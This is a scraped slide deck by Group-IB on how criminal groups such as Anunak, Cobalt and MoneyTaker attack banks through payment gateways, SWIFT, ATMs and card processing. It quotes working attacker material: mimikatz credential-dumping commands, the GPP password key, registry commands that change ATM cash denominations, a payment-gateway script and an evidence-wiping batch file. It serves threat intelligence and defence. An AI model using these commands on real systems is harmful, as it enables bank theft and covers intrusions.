SlideShare a Scribd company logo
GROUP-IB.COM 11
Hackers want your bank more
than your customers:
The evolution of targeted
attacks on financial
institutions
GROUP-IB.COM 22
Who are the attackers?
GROUP-IB.COM
Timeline
*Cobalt was detected in June
3
GROUP-IB.COM
Who are they? What are their favorite targets?
KNOWN TARGETED ATTACKERS
Buhtrap
ARM CBR (SWIFT analog)
Сobalt
ATM, Card processing, SWIFT
Corkow
Trading terminals,
Card processing, ATM
Anunak
Internet banking, ARM CBR,
SWIFT, Payment gateways,
Card processing, ATM
Lurk
ARM CBR (SWIFT analog)
4
GROUP-IB.COM 5
FUTURE TARGETED
ATTACKERS
• Toplel
• Ranbyus
• RTM
• Vawtrak
• Dridex
Balance is 500 thousand pounds,
inter-UK, for money mules (now
such money mules now). Skip for
now.
Account for authorization of
payments, balance is 2 million
pounds
No function of payment approval.
Balance is 18 million pounds.
Tried to transfer 2 million to China
Balance is 15 million pounds, dual
authorization off.
No opportunity to establish sort
code for transfer. It is better to
ring out
Future Attackers after your network
GROUP-IB.COM 66
What are the targets?
GROUP-IB.COM
Targets: Corporate internet banking software
• Compromise operator workstations
of corporate accounts
• Listing companies with high balances
• Generating new digital signatures
for each company
• Transactions from corporate accounts signed
with new digital signatures
7
Access to corporate internet banking
enables criminals to steal from TOP
clients. Anunak used this method in
2013-2014.
GROUP-IB.COM
Targets: Payment gateways
$ses = date("Ymdhis");
$url = "http://ru-demo.cyberplat.com/cgi-
bin/DealerSertification/de_pay.cgi";
$data_string =
"SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMM
ENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT
=10.0";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:
application/x-www-form-urlencoded','Content-Length:
'.strlen($data_string)));
curl_setopt($ch, CURLOPT_POSTFIELDS,
"inputmessage=0000038801SM000001270000012700000125&".$
data_string);
$result = curl_exec($ch);
var_dump($result);
• Once inside, hackers search for payment gateways
• Obtain log files from payment gateways to understand
the typical format of communication
• Start SOCKS proxies on internal hosts to enable
communication with payment gateways
• Run scripts to replenish attacker’s phone balances in
thousands of transactions
• Transfer money from phones to cards and cash out
8
Payment gateways enables high frequency, low
amount transfers. Very hard to stop and return
money.
GROUP-IB.COM
Targets: ATM
• Hackers Identify ATM manufactures
• They detect physical ATM locations
• Upload from internal network to ATM
• Jackpot with diagnostic tools
• Jackpot with custom malicious programs for specific ATMs
9
ATM heists – the easiest way to launder money.
Cobalt used malware to withdraw bags cash
totalling $2.6m from 41 ATMS in Taiwan.
GROUP-IB.COM
Targets: Trade terminals
• The attack lasted only 14 minutes
• $437 million in purchases (5 trades )
• $97 million sold (2 trades)
• 55 to 66 Rubles — volatility in exchange
rate
10
Corkow conducted the first
successful attack on broker
terminals in 2015.
GROUP-IB.COM
Targets: Trade terminals
11
GROUP-IB.COM
Targets: ARM CBR or SWIFT
SWIFT
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmin
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmout
ARM CBR
[ROOT_DRIVE]:uarm3exqinc
[ROOT_DRIVE]:uarm3exqout
• Identify working directory of
SWIFT or ARM CBR application
• Replace payment details with
fraudster’s information
• Intercept confirmation messages
to bypass identification of
fraudulent transactions
12
GROUP-IB.COM
Targets: Card processing
• Legally open bank cards in the same
bank or buy new cards on dark
market (usually about 30 cards)
• Remove or increase withdraw limits
• Remove overdraft limits
(even for debit cards)
• Cash out using these cards in other
countries
13
Cobalt, Corkow, Anunak have been conducting
these attacks since 2014.
It provides very important cash-out benefits.
GROUP-IB.COM 1414
Malware delivery
GROUP-IB.COM
Malware Delivery: Driveby
GROUPS WHICH HAVE USED
THIS METHOD:
• Anunak
• Corkow
• Buhtrap
• Lurk
800 000+ total visitor per day
11% average exploit success rate
90 000 possible infections per day
15
GROUP-IB.COM
Malware Delivery: Custom pay-per-install
GROUPS WHICH HAVE USED THIS
METHOD:
• Anunak
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver
iplist_file = 'ip.txt'
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
for line in f:
iplist.append(line.strip())
result = bulk_whois.lookup_ips(iplist)
with open(os.path.join(path, 'data.txt'), 'a') as f:
for record in result:
f.write('IP: %s
CC: %s
Org. Name: %s
Register: %s
AS Name: %s
BGP Prefix: %s
-------------------------------------------------------
' % (result[record]['ip'], result[record]['cc'], result[record]['org_name'],
result[record]['register'], result[record]['as_name'],
result[record]['bgp_prefix']))
16
WHAT THEY DID:
• Contact botnet owner
• Ask to provide IPs of infected machines
• Check IP list with script
• Check for records related to financial institutions
• Ask botnet owner to install new trojan
GROUP-IB.COM
Malware Delivery: Web hack
17
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak and individual hackers in 2013, 2014, 2015
WHAT THEY DO:
• Identify SQL injection
• Do EXEC in SQL request to gather information about net environment
• Upload files on server with
echo command
downloading from remote host
with Meterpreter
• Upload mimikatz on the Domain Controller
• Create hidden tunnels
GROUP-IB.COM
Malware Delivery: Phishing Emails
GROUPS WHICH HAVE
USED THIS METHOD:
• Anunak
• Buhtrap
• Lurk
• Cobalt
• MoneyTaker
METHODS TO ENSURE
DOCUMENTS ARE
OPENED:
• Mass mailing to corporate
email addresses
• Calls to bank managers
• Hacking bank clients
• Hacking bank partners
ATTACHMENTS:
• Executables
• Executables in
encrypted archive
• Document with exploits
• Document with
malicious macros
18
GROUP-IB.COM
Malware Delivery: Spear phishing with faked sender address
ADVANTAGES
DISADVANTAGES
• Easy to start
• Unlimited list of brands
• No need to register domains
• Less traces for the investigation
• High level of trust for users
• Hard to detect if email delivered
to end user
• Don’t pass Sender Policy
Framework (SPF) check
• Low delivery percent
19
GROUP-IB.COM
ADVANTAGES
DISADVANTAGES
• Can bypass Sender Policy Framework (SPF) check
• New TLD allows registering very similar domains
• High percent of delivery
• Vigilant users can detect it
• Additional traces for investigation
Malware Delivery: Spear phishing with faked sender address
20
GROUP-IB.COM
Malware Delivery: Spear phishing from compromised partner
ADVANTAGES
DISADVANTAGES
• Almost 100% delivery with correct attachment
• High percent of opening by users from contact list
• No need to rent server and register domains
• Limited by region where partner is located
21
GROUP-IB.COM
Tools to create malicious documents
Microsoft Word Intruder
(MWI)
OffensiveWare Multi Exploit
Builder (OMEB)
22
GROUP-IB.COM
The attack scheme
23
GROUP-IB.COM 2424
What they do inside your network
GROUP-IB.COM
Legal Software vs. Private Tools
New trend: Hackers Use Legal Software for Their Attacks
PRIVATE TOOLS LEGAL SOFTWARE
+
–
Legal attack framework has become very effective. Special trojans are not necessary anymore.
• Unknown before first public research
• Adjusted to the needs of the group
• Easy to use
• Inexperienced attackers can be involved
• Investments in development are needed
• High cost of ownership
• Becomes known quickly
• Dependency on developers
• Attracts attention
• Easier to attribute incidents and threat actors
• Simplifies the process of investigation
• Hard to track such attacks
• Difficult to link different incidents
• Less traces to investigate
• Difficult to detect in a local network
• Higher qualification
• Many solutions are DIY
• Difficult to attack several
targets simultaneously
25
GROUP-IB.COM
KSC as a tool for provisioning the malware
26
GROUP-IB.COM
KSC as a tool for provision of the RMS and scanning server
27
GROUP-IB.COM
Gaining privileges
DOMAIN CONTROLLER
CONFIGURATION ERROR
• Using Group Policy Preferences (GPP)
• [server_name]sysvol[domain_name]Policies[group_policy_nam
e]MachinePreferencesGroupsGroups.xml
• The perpetrators extract domain administrator credentials from the
cpassword and userName fields in the Groups.xml file (the password
is encrypted using the AES-256 algorithm and further coded using
Base64 encoding).
• To obtain an unencrypted password the attackers decode it using
Base64.
• This password is then decrypted using the key
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b
66c1b.
28
GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers have access to a domain controller
mimikatz sekurlsa::logonpasswords
If the attackers have local root privileges without
access to a domain controller
The attackers connect to workstations and servers in order to find a user with
access to the domain controller. The attack pass-the-hash can be performed.
29
GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers do not have local administrator rights
Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701,
CVE-2015-2363 and CVE-2015-2426 enables the criminal to gain SYSTEM level
privileges in x32 and x64 operating systems. The malware connects to hosts
andcheck them for necessary vulnerabilities.
MIMIKATZ GOLDEN TICKET
• "privilege::debug" "lsadump::samrpc /patch" exit
• extracting NTLM hash of the krbtgt account
(Key Distribution Center Service Account)
• creating a file with a gold TGT ticket
30
GROUP-IB.COM
Tools to research the network
netscan.exe – a network scanner NetScan
patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator)
plink.exe – an ssh console client for Windows
psexec.exe – a remote console for Windows
31
GROUP-IB.COM
Tools to research the network
REMOTE
ADMINISTRATION TOOLS:
• AmmyAdmin
• TeamViewer or TVRat
• Hamachi LogMeIn
• RMS
• LightManager
• HidenVNC
• Hidden channel over SMB,
DNS, HTTPS
32
GROUP-IB.COM
Provision of the trojan survivability
33
GROUP-IB.COM 34
Tools to used to complete attacks
GROUP-IB.COM
Change denomination of withdrawal banknotes
.bat file from ATM
Registry key name Value
VALUE_1 5000
VALUE_2 1000
VALUE_3 500
VALUE_4 100
• Remote access to ATM from internal network
• Launch .bat script that changed registry keys
• Money mule came to the ATM and withdraw cash from its bank account
• During withdraw he set small denominations
• Instead of small denominations the ATM spit out big denominations
from wrong cassette
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
35
GROUP-IB.COM
Modified diagnostic tools
• Attackers disabled the KDIAG function responsible for checking if the door is open.
• Uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash
• At the same time, a money mule came to the ATM with an open bag to grab money
36
GROUP-IB.COM
Software for attacks on ATMs
ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, “Cash Dispenser Module”).
Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15.
Cassette Number — the number of the cassette, which should dispense cash. The value should be set in the interval from 1 to 15.
Banknotes Count — the amount of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60.
Dispenses Count — the number of times cash dispenses should be repeated. The value should be set in the interval from 1 to 60.
A malicious program that uses standard functions for the XFS interface
via the XFS Manager (eXtensions for Financial Services).
37
GROUP-IB.COM
Outward Telegraphic Transfer Comm & Charges
MD5 6D355FFA06AE39FC8671CC8AC38F984E
Searches files in catalog:
D:WIN32APPSWIFTALLIANCESERVERBatchOutgoingHKHKAcksBak
In this instance, «Outgoing» signifies outgoing transactions, «HK» signifies Hong
Kong, accordingly the program searches for transactions to Hong Kong banks.
If file is bigger than 102400 bytes it then attaches into file
C:TempMsglog.txt «Too big file <file name> : <file size> > 102400rn», it
opens and will search substrings: «OTTC605384», «OTTC605385»,
«OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382»
If a file contains this substring, then it writes into log C:TempMsglog.txt
the following string «Found file: %s with required token: <founded
substring>rn» and copies this file into directory «C:TempMsg»
Then it goes into standby mode each 2.5 seconds, and then repeats the search
of the substring.
Hong Kong-based FI
OTTC605384
OTTC605385
OTTC601386
OTTC601387
OTTC605381
OTTC605382
38
GROUP-IB.COM
ARM CBR (SWIFT analoge)
MONEYTAKER V5.0
Four modules:
Main – launch other modules with parameters specified in main config file
AutoReplacer (XmlBin) – replaces in ARM CBR directory payment details. Results of
replacement writes to Xml-Resultfile. Do not change SUM field to avoid detection.
Hiding (EdBin) – checks for incoming/confirmation messages. It checks for field
«PayeePersonalAcc» and compare it with «HackAcc» in from Xml-Resultfile.
If the values match, then hiding module restore original PayeePersonalAcc field.
Temp (TxtBin) – unknown.
Xml-Resultfile
#
#
Id=
OrigAcc=
OrigBic=
OrigCor=
Purpose=
HackAcc=
HackBic=
HackCor=
Sum=
PayerPersonalAcc=
#
#
39
GROUP-IB.COM
Software to clean evidences
DEL.BAT
sdelete.exe -accepteula -p 32 d2.exe
sdelete.exe -accepteula -p 32 xtl.exe
sdelete.exe -accepteula -p 32 *.txt
sdelete.exe -accepteula -p 32 d2s.exe
del sdelete.exe
del del.bat
The del.bat script launches the SDelete program,
which is designed to delete files in a special
manner making it impossible to recover them
with a forensic investigation.
MBR KILLER
Program deletes Master boot record (MBR)
40
GROUP-IB.COM
Future
More criminal groups
Targeted attacks is a new call for attackers who
know about banks and money laundering
More attacks
Global landscape, ready to use tools, technics
and tactics allows to be more effective.
Legal software
We will see much more attacks with use if legal
software without private trojans.
Harder to attribute and investigate
Legal software in attacks will force us to change
attribution and investigation procedures.
41
GROUP-IB.COM 4242
Questions?
GROUP-IB.COM 4343
E-mail
help@group-ib.com
Web site
www.group-ib.com
Facebook
facebook.com/group-ib
Twitter
twitter.com/groupib_gib

More Related Content

What's hot

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
Festival Software Livre
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat Security Conference
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
Thomas Roccia
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Sergey Soldatov
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat Security Conference
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
CODE BLUE
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
CODE BLUE
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Security Bootcamp
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012
Andrew Morris
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat Security Conference
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat Security Conference
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 ||  “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 ||  “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
Строим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атакиСтроим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атаки
Positive Hack Days
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
Priyanka Aash
 
Denial of Service
Denial of ServiceDenial of Service
Denial of Service
MarketingArrowECS_CZ
 

What's hot (20)

Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole BlueHat v17 || Down the Open Source Software Rabbit Hole
BlueHat v17 || Down the Open Source Software Rabbit Hole
 
TRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS MalwareTRITON: The Next Generation of ICS Malware
TRITON: The Next Generation of ICS Malware
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard BlueHat v17 || Securing Windows Defender Application Guard
BlueHat v17 || Securing Windows Defender Application Guard
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
 
Weekend Malware Research 2012
Weekend Malware Research 2012Weekend Malware Research 2012
Weekend Malware Research 2012
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
BlueHat v17 || A Lustrum of Malware Network Communication: Evolution and Insi...
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 ||  “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 ||  “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
 
Строим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атакиСтроим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атаки
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
Denial of Service
Denial of ServiceDenial of Service
Denial of Service
 

Similar to Хакеры хотят ваш банк больше, чем ваших клиентов

How i'm going to own your organization v2
How i'm going to own your organization v2How i'm going to own your organization v2
How i'm going to own your organization v2
RazorEQX
 
Making your Asterisk System Secure
Making your Asterisk System SecureMaking your Asterisk System Secure
Making your Asterisk System Secure
Digium
 
Hunting on the cheap
Hunting on the cheapHunting on the cheap
Hunting on the cheap
Anjum Ahuja
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
EndgameInc
 
News Bytes - December 2015
News Bytes - December 2015News Bytes - December 2015
News Bytes - December 2015
n|u - The Open Security Community
 
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive MalwareShah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh
 
Ethical hacking (legal)
Ethical hacking (legal)Ethical hacking (legal)
Ethical hacking (legal)
Thangaraj Murugananthan
 
Anatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail BreachAnatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail Breach
IBM Security
 
Ddos
DdosDdos
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
Tenet Systems Pvt Ltd
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
Sophos Benelux
 
Ransomware webinar may 2016 final version external
Ransomware webinar   may 2016 final version externalRansomware webinar   may 2016 final version external
Ransomware webinar may 2016 final version external
Zscaler
 
IoT Security, Mirai Revisited
IoT Security, Mirai RevisitedIoT Security, Mirai Revisited
IoT Security, Mirai Revisited
Clare Nelson, CISSP, CIPP-E
 
How to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay AliveHow to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay AlivePositive Hack Days
 
Browser isolation (isc)2 may presentation v2
Browser isolation (isc)2 may presentation v2Browser isolation (isc)2 may presentation v2
Browser isolation (isc)2 may presentation v2
Wen-Pai Lu
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
Rakuten Group, Inc.
 
Ransomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessRansomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT business
Calyptix Security
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
Debra Baker, CISSP CSSP
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself Alert Logic
 

Similar to Хакеры хотят ваш банк больше, чем ваших клиентов (20)

How i'm going to own your organization v2
How i'm going to own your organization v2How i'm going to own your organization v2
How i'm going to own your organization v2
 
Making your Asterisk System Secure
Making your Asterisk System SecureMaking your Asterisk System Secure
Making your Asterisk System Secure
 
Hunting on the cheap
Hunting on the cheapHunting on the cheap
Hunting on the cheap
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
 
News Bytes - December 2015
News Bytes - December 2015News Bytes - December 2015
News Bytes - December 2015
 
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive MalwareShah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
Shah Sheikh / ISACA UAE - Deep Dive on Evasive Malware
 
Ethical hacking (legal)
Ethical hacking (legal)Ethical hacking (legal)
Ethical hacking (legal)
 
Anatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail BreachAnatomy of an Advanced Retail Breach
Anatomy of an Advanced Retail Breach
 
Ddos
DdosDdos
Ddos
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
How to stay protected against ransomware
How to stay protected against ransomwareHow to stay protected against ransomware
How to stay protected against ransomware
 
Ransomware webinar may 2016 final version external
Ransomware webinar   may 2016 final version externalRansomware webinar   may 2016 final version external
Ransomware webinar may 2016 final version external
 
IoT Security, Mirai Revisited
IoT Security, Mirai RevisitedIoT Security, Mirai Revisited
IoT Security, Mirai Revisited
 
How to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay AliveHow to Hack a Telecom and Stay Alive
How to Hack a Telecom and Stay Alive
 
Browser isolation (isc)2 may presentation v2
Browser isolation (isc)2 may presentation v2Browser isolation (isc)2 may presentation v2
Browser isolation (isc)2 may presentation v2
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
How to build corporate size fraud prevention
How to build corporate size fraud preventionHow to build corporate size fraud prevention
How to build corporate size fraud prevention
 
Ransomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessRansomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT business
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptx
 
CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself CyberCrime in the Cloud and How to defend Yourself
CyberCrime in the Cloud and How to defend Yourself
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Positive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
Positive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
Positive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
Positive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
Positive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
Positive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
